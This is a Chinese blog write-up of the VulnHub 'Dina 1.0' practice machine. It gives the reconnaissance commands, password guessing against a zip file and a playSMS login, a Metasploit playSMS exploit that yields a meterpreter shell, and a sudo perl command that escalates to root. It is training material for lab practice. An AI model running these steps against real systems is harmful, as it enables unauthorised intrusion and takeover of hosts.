vnlnhub系列:Dina: 1.0

于 2024-08-01 21:23:45 发布
阅读量264 收藏 4
点赞数 2
分类专栏: vulnhub系列 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jq_j37/article/details/140857735
版权

vnlnhub系列:Dina: 1.0

靶机下载

一、信息收集

nmap扫描存活

nmap 192.168.23.0/24

image-20240801202435393

nmap扫描端口,开放端口80

nmap 192.168.23.172 -p- -sV -Pn -O

image-20240801202558024

dirb目录扫描,存在robots.txt文件、secure,tmp,uploads等目录

dirb http://192.168.23.172/

image-20240801202836600

访问80端口

image-20240801202738843

访问robots.txt

image-20240801202925185

逐个拼接访问,访问nothing时,页面显示not found,f12查看源码,发现5个密码,备份一下

#my secret pass
freedom
password
helloworld!
diana
iloveroot

image-20240801203432110

访问secure时,发现一个backup.zip压缩包

image-20240801203805853

下载下来,解压时需要密码,此前获得的密码可以用来爆破,得到密码 freedom

image-20240801204137835

解压后得到一个mp3文件,但是无法打开,显示损坏

image-20240801204224455

使用文本工具打开,给出了用户名和一个url地址

touhid

/SecreTSMSgatwayLogin

image-20240801204334148

访问得到的url地址,是一个playsms框架

image-20240801204653952

使用得到的用户名和密码本爆破登录,得到密码 diana

touhid:diana

image-20240801205029514

二、getshell

msfconsole,搜索playsms

msfconsole

search playsms

image-20240801205856517

尝试可利用漏洞,options查看配置

use 0

options

image-20240801210200726

配置信息

image-20240801210224300

将需要的配置信息补全

set password diana

set rhosts 192.168.23.172	(靶机IP)

set targeturi SecreTSMSgatwayLogin	(上传文件的路径)

set username touhid

set lhost 192.168.23.133	(攻击机kali的IP)

run

image-20240801210755759

成功得到meterpreter

image-20240801210845213

三、提权

输入shell,python提升交互性,并查看当前权限

shell

python -c "import pty;pty.spawn('/bin/bash')"

sudo -l

image-20240801211110472

可以看到所有用户都可以执行perl命令

执行命令进行提权,提权成功

sudo perl -e 'exec "/bin/sh";'

image-20240801211546328

三天三夜睡不着
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【VulnHub靶机渗透】四:Dina-1
野原新之助
04-13 824
该靶机设定一些线索,引导用户得到相关信息,并使用了一个包含漏洞(代码执行)的Web应用系统版本。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成(万分感谢提供靶机镜像的同学)。
靶机实战-Dina 1.0
滕财然的博客
01-28 1173
Dina 1.0靶机实战 文章目录Dina 1.0靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问80端口--http服务5、提权提权方式二 1、主机发现 目标IP:192.168.232.157 2、端口扫描 3、端口详细信息扫描 只开放80端口 4、访问80端口–http服务 主页啥都没有,直接dirb扫一下目录 依次访问目录: index就是主页,就不看了 发现robo...
靶机记录(一):Dina
weixin_47306547的博客
10-29 209
目录 主机发现 端口扫描 Web渗透 目录扫描 信息利用 GetShell 提权 清痕迹,留后门 主机发现 端口扫描 Web渗透 目录扫描 信息利用 GetShell 提权 清痕迹,留后门
nanoid-dart:Dina实施Ainanoid
05-07
纳米 DART实现 安装 添加nanoid作为 用法 普通的 import 'package:nanoid/nanoid.dart' ; void main () { var id = nanoid ();... var custom_length_id = nanoid ( 10 );... var id = customAlphabet ( '1234567890...
dina:CHAT APP
02-08
DINA:CHAT APP】 DINA是一款基于JavaScript技术构建的聊天应用程序。在当前数字化时代,实时通讯已经成为人们日常生活和工作中不可或缺的一部分,而DINA旨在提供一个便捷、高效的沟通平台。这款应用利用...
DinaDevopsWebAppProject:Dina Devops地址簿WebApp项目,具有Selenium测试和devops测试
04-16
地址簿教程本教程将教您一些基本概念。 它是学习入门的快速阅读,而不是有关如何设计应用程序的示例。 请注意,此示例使用并要求Java 8才能运行。从命令行运行示例$ mvn jetty:run打开导入IntelliJ IDEA 14 这些说明...
DINA Model and Parameter Estimation:A Didactic.pdf
05-30
DINA模型及其参数估计,作者Jimmy de la Torre,发表于2009年,引用数为:385
object-store-api:AAFC DINA对象存储实现
02-16
AAFC DINA对象存储实现。 请参阅DINA对象存储。 必需的 Java 11 Maven 3.6(已测试) Docker 19+(用于运行集成测试) 数据库 该项目需要PostgreSQL数据库才能运行。 小野 还需要服务来运行项目(测试不需要)。...
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 751
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
网络安全相关竞赛比赛
黑战士的博客
07-18 1411
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
网络安全防御【IPsec VPN搭建】
miss_copper的博客
07-25 1258
防火墙的g0/0/0口默认的IP地址为192.168.0.1/24;但是我们需要在浏览器中打开FW2的web服务就需要将g0/0/0接口的IP地址修改为192.168.142.40/24与我们Clound中虚拟网卡通一个网段才行。20、将双机热备改成主备模式,通过内网的VPN设备构建一条到达分公司的IPsec VPN通道,保证10.0.2.0/24网段可以访问到192.168.1.0/24网段。登录成功之后需要修改你的密码才能进入防火墙的用户视图。IPsec策略协商成功!成功修改为主备模式!
网络安全之不同阶段攻防手段(四)
子非渔
07-25 475
前面已经说过信息收集、扫描探测以及初始访问阶段的攻防手段,下面将说一下在攻击者获取到访问权限的情况下会接着如何进一步在网络中建立控制点、提权、横移以及完成攻击后的遗迹隐藏
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8357
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Java面试整理,涵盖基础、JVM、线程并发、框架、MySQL、微服务、Redis、中间件、数据结构与算法等。陆续完善中.zip
07-31
Java面试整理,涵盖基础、JVM、线程并发、框架、MySQL、微服务、Redis、中间件、数据结构与算法等。陆续完善中
chromedriver-mac-x64_121.0.6167.184.zip
最新发布
07-31
chromedriver-mac-x64_121.0.6167.184.zip
【Java面试+Java技术文章汇总】 涵盖大部分Java程序员所需要掌握的核心知识。.zip
07-31
【Java面试+Java技术文章汇总】 涵盖大部分Java程序员所需要掌握的核心知识。
资源管理的艺术:使用MySQL用户资源配额优化性能
07-31
MySQL是一个流行的开源关系型数据库管理系统(RDBMS),广泛用于Web应用程序的后端数据存储。它基于结构化查询语言(SQL)来管理数据,并且是LAMP(Linux, Apache, MySQL, PHP/Python/Perl)技术栈的一部分,这个技术栈常用于构建动态网站和Web应用程序。 MySQL的特点包括: - **开放源代码**:MySQL的源代码是公开的,任何人都可以自由使用和修改。 - **跨平台**:MySQL可以在多种操作系统上运行,包括Linux、Windows、macOS等。 - **高性能**:MySQL以其快速的查询处理和良好的性能而闻名。 - **可靠性**:MySQL提供了多种机制来确保数据的完整性和可靠性,包括事务支持、备份和恢复功能。 - **易于使用**:MySQL提供了简单直观的界面和丰富的文档,便于用户学习和使用。 - **可扩展性**:MySQL支持从小型应用到大型企业级应用的扩展。 - **社区支持**:由于其广泛的使用,MySQL拥有一个活跃的开发者社区,提供大量的资源和支持。 MySQL被广泛应用于各种场景,包括在线事务处理(OL
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值